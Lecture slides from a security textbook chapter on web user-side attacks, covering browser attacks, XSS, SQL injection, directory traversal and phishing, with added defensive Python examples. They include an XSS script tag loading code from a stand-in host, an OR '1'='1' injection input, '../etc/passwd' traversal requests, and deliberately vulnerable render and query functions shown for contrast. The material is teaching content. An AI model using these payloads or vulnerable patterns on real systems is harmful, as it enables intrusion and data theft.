Security in Computing, Fifth Edition
Chapter 4: The Web—User Side
From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
Chapter 4 Objectives
Attacks against browsers
Fake and malicious websites
Attacks targeting sensitive data
Injection attacks
Spam
Phishing attacks
Internet Usage
1995 – <1%
2005 – 1 Billion or ~16%
2010 – 2 Billion or ~30%
2014 – 3 Billion or ~41%
2016 – 3.4 Billion or ~46%
Browser Vulnerabilities
As browsers have in many ways become our new operating systems, the increases in complexity and scrutiny can be seen in this chart of newly discovered browser vulnerabilities.
Browser Popularity
Browser Vulnerabilities
Browser Attack Types
Man-in-the-browser
Keystroke logger
Page-in-the-middle
Program download substitution
User-in-the-middle
These types of browser attack are covered in more depth in the next few slides.
Man-in-the-Browser
A Trojan that is generally installed as a browser plug-in
SilentBanker was a Trojan that was generally installed as a browser plug-in. When it detected the user going to a banking URL, it would intercept keystrokes and even modify them so that money transfers would go to attackers’ accounts.
Keystroke Logger
Hardware or software that records all keystrokes
May be a small dongle plugged into a USB port or can masquerade as a keyboard
May also be installed as malware
Not limited to browsers
Page-in-the-Middle
User is directed to a different page than believed or intended
Similar effect to a man-in-the-browser, where attacker can intercept and modify user input
Program Download Substitution
Attacker creates a page with seemingly innocuous and desirable programs for download
Instead of, or in addition to, the intended functionality, the user installs malware
This is a very common technique for spyware
User-in-the-Middle
Using click-bait to trick users into solving CAPTCHAs on spammers’ behalf
CAPTCHAs are used by websites to defeat automation, such as by preventing spammers from scripting the creation of massive numbers of email accounts. By using dummy websites to entice users into solving CAPTCHAs, attackers can effectively defeat the CAPTCHAs at scale.
Successful Authentication
The attacks listed above are largely failures of authentication
Can be mitigated with
Shared secret
One-time password
Out-of-band communication
Common examples of these mechanisms are SecurID tokens, Google Authenticator, and text message codes. Driver signing is an example of using such techniques to mitigate local malware.
Fake Website
Example of a fake banking website meant to trick users.
Fake Code
Example of a software download site meant to trick users into downloading malicious applications.
Tracking Bug
A tiny image served up from one provider (“ClicksRUs”) that allows user behavior to be tracked across many sites for advertising purposes. Students probably notice this when they see web ads that offer up items very similar to ones they’ve recently been shopping for on other sites. Web bugs can also be used to track users’ reading of advertising emails.
Clickjacking
Clickjacking is a way of tricking users into providing desired input. The attacker makes the input dialog transparent and places an image with an enticement below the transparent dialog. The user ends up answering a question he didn’t even know he was being asked, unknowingly authorizing his computer to execute the attacker’s will. “Framing”—moving and layering HTML iframes—is an important component of this attack.
Drive-By Download
Code is downloaded, installed, and executed on a computer without the user’s knowledge
May be the result of clickjacking, fake code, program download substitution, etc.
Unwanted browser toolbars are an example that just about every student will have had experience with.
Cross-Site Scripting (XSS)
Tricking a client or server into executing scripted code by including the code in data inputs
Scripts and HTML tags are encoded as plaintext just like user inputs, so they can take over web pages similarly to the way buffer overflow attacks can take over programs
Cool<br>story.<br>KCTVBigFan<script src=http://badsite.com/xss.js></script>
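A worked example added to these notes (not from the textbook) of why the comment above takes over a page and how output encoding neutralizes it. The comment string is the one on the slide; the three render functions, the `<br>` allowlist and the detector are constructed for this example.

```python
import html
import re

# The slide's sample comment: a forum post with a script tag hidden after the text
UNTRUSTED_COMMENT = (
    "Cool<br>story.<br>KCTVBigFan"
    "<script src=http://badsite.com/xss.js></script>"
)


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: user text is pasted straight into the page markup,
    so the browser parses the <script> tag and runs the remote file."""
    return f'<div class="comment">{comment}</div>'


def render_comment_escaped(comment: str) -> str:
    """Safe: every < > & " ' becomes an entity, so the browser shows it as text."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'


# Only an already-escaped, attribute-free <br> is allowed back through
_ALLOWED_BR = re.compile(r"&lt;br\s*/?&gt;", re.IGNORECASE)


def render_comment_allowlist(comment: str) -> str:
    """Escape everything first, then re-enable the one harmless tag users want."""
    escaped = html.escape(comment, quote=True)
    return f'<div class="comment">{_ALLOWED_BR.sub("<br>", escaped)}</div>'


def contains_script_tag(markup: str) -> bool:
    """Crude detector used to compare the three renderings."""
    return re.search(r"<script\b", markup, re.IGNORECASE) is not None


if __name__ == "__main__":
    for render in (render_comment_unsafe, render_comment_escaped, render_comment_allowlist):
        out = render(UNTRUSTED_COMMENT)
        print(f"{render.__name__}: script tag present = {contains_script_tag(out)}")
```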
Cross-Site Scripting (XSS)
Cross-Site Scripting (Reflected XSS)
SQL Injection
Injecting SQL code into an exchange between an application and its database server
Example:
Loading an SQL query into a variable, taking the value of acctNum from an arbitrary user input field:
QUERY = "SELECT * FROM trans WHERE acct = '" + acctNum + "';"
The same query with malicious user input:
QUERY = "SELECT * FROM trans WHERE acct = '2468' OR '1'='1'; "
The result of this example attack is that the application returns the entire accounts table from the database.
Dot-Dot-Slash
Also known as “directory traversal,” this is when attackers use the sequence “../” to access files that are on the target web server but not meant to be accessed from outside
Most commonly entered into the URL bar but may also be combined with other attacks, such as XSS
IE is Evil
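One way a server can refuse the “../” requests described above, written for these notes rather than taken from the textbook. It assumes POSIX paths and a web root passed in by the caller; the function name and the percent-decoding step are constructed for this example.

```python
import os
import urllib.parse
from typing import Optional


def safe_web_path(web_root: str, requested: str) -> Optional[str]:
    """Map a requested URL path to a file under web_root, or None if it escapes.

    Percent-encoding is decoded first so "%2e%2e%2f" is handled the same as "../"
    (the "account for every encoding" rule), then the path is normalized with
    realpath and its prefix is compared against the root.
    """
    root = os.path.realpath(web_root)
    decoded = urllib.parse.unquote(requested)
    # Drop leading slashes so an absolute request cannot replace the root on join
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/\\")))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample requests against a hypothetical document root
    for req in ("images/logo.png", "../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd"):
        print(f"{req!r:32} -> {safe_web_path('/srv/www', req)}")
```

A doubly encoded request such as `%252e%252e` is decoded only once, leaving a literal `%2e%2e` filename that still resolves under the root.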
Server-Side Include (SSI)
SSI is an interpreted server-side scripting language that can be used for basic web server directives, such as including files and executing commands
As is the case with XSS, some websites are vulnerable to allowing users to execute SSI directives through text input
Countermeasures to Injections
Filter and sanitize all user input
Need to account for every potentially valid encoding
Make no assumptions about the range of possible user inputs—trust nothing, check everything
Use access control mechanisms on backend servers, such as “stored procedures,” which separate SQL code from SQL data and thus prevent most SQL injection attacks.
Stored procedures effectively separate SQL code from SQL data, thus preventing most SQL injection attacks.
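A runnable version, added to these notes rather than taken from the textbook, of the SQL Injection slide’s query and of this slide’s point that separating SQL code from SQL data stops the attack. It uses Python’s built-in sqlite3 with a constructed three-row table; since SQLite has no stored procedures, the hardened query uses a bound parameter, which gives the same code/data separation.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory table shaped like the slide's 'trans' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE trans (acct TEXT, amount INTEGER)")
    conn.executemany("INSERT INTO trans VALUES (?, ?)",
                     [("2468", 100), ("1357", 250), ("9999", 75)])
    return conn


def transactions_concat(conn: sqlite3.Connection, acct_num: str) -> list:
    """Vulnerable: the slide's string concatenation; user text becomes SQL code."""
    query = "SELECT * FROM trans WHERE acct = '" + acct_num + "';"
    return conn.execute(query).fetchall()


def transactions_param(conn: sqlite3.Connection, acct_num: str) -> list:
    """Hardened: the value travels to the engine separately from the SQL text,
    so quotes inside it can never change the statement's structure."""
    return conn.execute("SELECT * FROM trans WHERE acct = ?;", (acct_num,)).fetchall()


# The slide's malicious input: closes the quote and appends OR '1'='1'
MALICIOUS_ACCT = "2468' OR '1'='1"

if __name__ == "__main__":
    db = make_demo_db()
    print("concat, normal input :", transactions_concat(db, "2468"))
    print("concat, malicious    :", transactions_concat(db, MALICIOUS_ACCT))
    print("param,  malicious    :", transactions_param(db, MALICIOUS_ACCT))
```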
Email Spam
Experts estimate that 60% to 90% of all email is spam
Types of spam:
Advertising
Pharmaceuticals
Stocks
Malicious code
Links for malicious websites
Spam countermeasures
Laws against spam exist but are generally ineffective
Email filters have become very effective for most spam
Internet service providers use volume limitations to make spammers’ jobs more difficult
My email example (Knucklehead from SC)
Phishing
A message that tries to trick a victim into providing private information or taking some other unsafe action
Spear phishing: A targeted attack that is personalized to a particular recipient or set of recipients
Countermeasures
User education (Wombat/PhishMe)
Limited effectiveness and very subject to co-evolution with attacks
PGP and S/MIME
Cryptographic solutions (encryption & signatures) that have seen very limited adoption after years on the market
OTHERS (Good research area)
User education has become more scientific over the years, with products like PhishMe automating the user training process and focusing on the worst offenders. PGP and S/MIME are both solutions for encrypting and signing email.
Summary
What is the most secure web server?
What is second best?
Summary
Activities:
Server Maintenance
Web App Updates
Web site coding
Limit Information Transfer
Technologies:
Web scans (+ penetration testing)
Firewalls, Antivirus, and IPS/IDS (Intrusion detection system)
Web site security audit tools
Summary
As web browsers have become a primary focus of users and taken on greater functionality, they’ve become a focus of many types of attack
Browser and website weaknesses are often the result of some form of poor authentication
Many attackers focus on tricking users with fake websites, misleading applications, and phishing emails
On the server side, injection attacks are a key concern, and countermeasures to prevent them are critical